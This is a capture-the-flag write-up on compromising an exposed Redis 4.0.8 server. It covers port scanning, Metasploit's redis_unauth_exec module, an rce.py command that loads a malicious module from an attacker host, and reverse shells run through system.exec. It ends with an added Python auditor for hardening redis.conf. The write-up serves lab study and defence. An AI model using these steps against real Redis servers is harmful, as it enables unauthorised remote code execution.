As per usual we start with an Nmap scan of the target. Get in the habit of scanning all TCP ports (nmap -p-): with Red, if you only scan the top 1000 ports you will miss port 6379. The scan shows SSH on 22, a web server on 80, and an uncommon port, 6379, hosting Redis 4.0.8. The version matters later: the module-loading trick used for code execution depends on MODULE LOAD, which exists from Redis 4.0 onwards.

I'll use Gobuster to find any hidden directories that might be lurking behind port 80.

gobuster dir --wordlist /usr/share/wordlists/dirb/big.txt --url 172.31.1.9

Didn't find very much using Gobuster: only a couple of directories and nothing that looks particularly interesting. When I encounter a web server or an HTTP port I always scan it with Nikto. Here again we confirm the hidden directories we found with Gobuster; however, we don't find anything else useful.

I've mentioned this before, but in terms of penetration testing SSH on port 22 is rarely the initial entry point for a box. There are exploits for SSH, but in my experience SSH is used primarily in the post-exploitation phase, either for privilege escalation or for establishing a better shell once you've obtained credentials.

That leaves us with port 6379 and the service Redis. I wasn't familiar with Redis prior to this box, so I did a Google search and found that Redis stands for Remote Dictionary Server. It's used as an in-memory database and message broker for web applications, among other things, so it works along with the web server on port 80. If you'd like further information on Redis and how to exploit it, there's a great presentation available from ZeroNights.

A quick and dirty Searchsploit reveals we have a couple of options for exploits, including one Metasploit module. Since we found a Metasploit module for Redis, let's see if we can get a shell using it. We'll use the 4th result since we don't have credentials yet and it's an unauthenticated exploit.

use exploit/linux/redis/redis_unauth_exec

Configure the following parameters and run the exploit. I think it took me two tries; the first time I didn't have a parameter set correctly. On the second attempt I did establish a Meterpreter session.

Now the manual route. To begin, let's connect to the Redis port 6379 using Netcat. You'll want to add the -v flag for verbose output. Since we can run the info command and get results back, we have unauthenticated access to Redis. If a password were configured (requirepass), Redis would answer with a NOAUTH error instead, and a DENIED error would mean protected mode is refusing connections from non-loopback addresses.

Now we need a working exploit that will give us remote code execution. Let's do a Google search for "redis rce" and see what's available. The second search result is exactly what I wanted. Run the rce.py script and see what parameters are required. We need the basics of course: RHOST, RPORT, LHOST, LPORT. However, we will also need a module file, which is not provided by this exploit. I did a search for "redis execute module" and found one located on GitHub: RedisModules-ExecuteCommand.

Quick start: clone the GitHub repository to your local machine, navigate into the directory and run make in the terminal to build the module.so file. With module.so built we are ready to launch the exploit.

python3 rce.py -r 172.31.1.9 -L 10.10.0.14 -f module.so

Before we continue with the Redis RCE, let's switch over to another terminal window and again use Netcat to connect to the Redis service. Here we will attempt to execute a reverse shell using the system.exec command. system.exec is a command registered by the module we just loaded; it tells Redis to run its argument as a command on the local system, with the privileges of the redis-server process. Here you can see I tried a simple bash reverse shell on two different ports before I went on to the Python reverse shell. Remember to set up another Netcat listener on your favourite port before executing the reverse shell command. I was able to get a reverse shell using python3.

Now we have our lower privileged user, redis. Upgrade the shell to a proper pty:

python3 -c 'import pty; pty.spawn("/bin/bash")'

All of the write-ups for the box typically rely on a tool called pspy64 to analyze running processes, and that is used to find the privilege escalation path.
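Added example, not from the write-up: the defensive counterpart of the path above. It audits the redis.conf directives that decide whether unauthenticated access, CONFIG SET, SLAVEOF to a rogue master and MODULE LOAD are available, and runs over two constructed snippets, one weak and one hardened. The finding strings are mine; the directive names are Redis's own (enable-module-command only exists on Redis 7.0 and later, and rename-command REPLICAOF only from 5.0, so drop that line on a 4.x server or it will refuse to start).

```python
# Added example (not the write-up's code). WEAK_CONF and HARDENED_CONF are
# constructed snippets, not the box's actual configuration.

LOOPBACK = {"127.0.0.1", "::1", "-::1", "localhost"}
RENAME_AWAY = ("CONFIG", "SLAVEOF", "REPLICAOF")   # the attacker's building blocks
EMPTY = ('""', "''")


def parse_conf(text: str):
    """(directive, args) pairs from redis.conf text; '#' lines are comments."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            parts = line.split()
            rows.append((parts[0].lower(), parts[1:]))
    return rows


def audit_redis_conf(text: str):
    """Return the list of weaknesses found, empty when the config is hardened."""
    rows = parse_conf(text)
    args_of = lambda name: [a for d, a in rows if d == name]
    findings = []

    binds = args_of("bind")
    # No bind line means all interfaces; any non-loopback address exposes it
    # and also switches protected mode off, whatever protected-mode says.
    if not binds or any(addr not in LOOPBACK for addr in binds[-1]):
        findings.append("reachable on a non-loopback address")
    if any(a and a[0].lower() == "no" for a in args_of("protected-mode")):
        findings.append("protected-mode disabled")
    if not any(a and a[0] not in EMPTY for a in args_of("requirepass")):
        findings.append("no requirepass: every client that reaches the port is trusted")

    renamed = {a[0].upper() for a in args_of("rename-command")
               if len(a) >= 2 and a[1] in EMPTY}
    module_off = "MODULE" in renamed or any(
        a and a[0].lower() == "no" for a in args_of("enable-module-command"))
    if not module_off:
        findings.append('MODULE LOAD available (rename-command MODULE "" or enable-module-command no)')
    for cmd in RENAME_AWAY:
        if cmd not in renamed:
            findings.append(f"{cmd} not renamed away")
    return findings


WEAK_CONF = """
bind 0.0.0.0
port 6379
protected-mode no
daemonize yes
"""

HARDENED_CONF = """
bind 127.0.0.1
port 6379
protected-mode yes
requirepass REPLACE-WITH-A-LONG-RANDOM-SECRET
rename-command CONFIG ""
rename-command MODULE ""
rename-command SLAVEOF ""
rename-command REPLICAOF ""
enable-module-command no
"""

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_redis_conf(conf) or "no findings")
```

Renaming commands to the empty string removes them entirely; if an application legitimately needs CONFIG, rename it to a long random string instead and keep requirepass, since the password is what stops an anonymous client from reaching any command at all.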